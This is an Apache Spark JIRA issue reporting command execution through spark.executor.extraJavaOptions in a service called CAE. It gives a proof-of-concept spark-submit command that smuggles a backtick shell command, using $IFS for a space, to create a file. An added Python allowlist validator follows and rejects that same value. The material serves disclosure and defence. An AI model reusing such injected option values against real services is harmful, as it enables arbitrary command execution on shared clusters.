Lu jiadong created SPARK-50242:
----------------------------------
Summary: Command Execution Vulnerability in CAE
Key: SPARK-50242
URL: https://issues.apache.org/jira/browse/SPARK-50242
Project: Spark
Issue Type: Bug
Components: Spark Submit
Affects Versions: 3.5.3
Reporter: Lu jiadong
CAE allows users to submit a jar package and set extraJavaOptions,
but Spark has an incomplete check of it, leading to command execution.
Using the command below, one can see that the /abc file was created:
spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf
spark.executor.extraJavaOptions="\`touch\$IFS/abc\`" test.jar
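
A defensive check that a submission front end such as the CAE described above could apply to a user-supplied extraJavaOptions value before invoking spark-submit, as an added example that is not part of the original report or of Spark's code. It assumes the service receives the option value as a string; the allowlist pattern and the function names are hypothetical.

```python
import re

# Characters allowed inside an option value: none of them is special to a
# POSIX shell (no backtick, $, ;, |, &, quotes, parentheses, redirects).
_SAFE = r"[A-Za-z0-9_.,:/=+@%-]"

# Allowlist of JVM option shapes (an assumption; extend it per deployment).
_JVM_OPTION = re.compile(
    rf"-(?:D[A-Za-z0-9_.-]+(?:={_SAFE}*)?"   # -Dkey or -Dkey=value
    rf"|XX:[+-][A-Za-z0-9]+"                 # -XX:+Flag / -XX:-Flag
    rf"|XX:[A-Za-z0-9]+={_SAFE}+"            # -XX:Name=value
    rf"|X[a-z]+{_SAFE}*)"                    # -Xss4m, -Xlog:gc
)


class RejectedOption(ValueError):
    """Raised when a token is not a recognised, shell-inert JVM option."""


def validate_extra_java_options(value: str) -> list[str]:
    """Split on whitespace and require every token to match the allowlist."""
    tokens = value.split()
    for tok in tokens:
        if not _JVM_OPTION.fullmatch(tok):
            raise RejectedOption(f"refusing JVM option token: {tok!r}")
    return tokens


def build_submit_argv(main_class: str, jar: str, extra_java_options: str) -> list[str]:
    """Return an argv list for subprocess.run(argv) without shell=True."""
    opts = validate_extra_java_options(extra_java_options)
    return [
        "spark-submit", "--class", main_class,
        "--master", "yarn", "--deploy-mode", "client",
        "--conf", "spark.executor.extraJavaOptions=" + " ".join(opts),
        jar,
    ]


if __name__ == "__main__":
    # Constructed inputs: one benign value and the value from the report.
    for sample in ["-Dfoo=bar -XX:+UseG1GC -Xss4m", "`touch$IFS/abc`"]:
        try:
            print("accepted:", validate_extra_java_options(sample))
        except RejectedOption as exc:
            print("rejected:", exc)
```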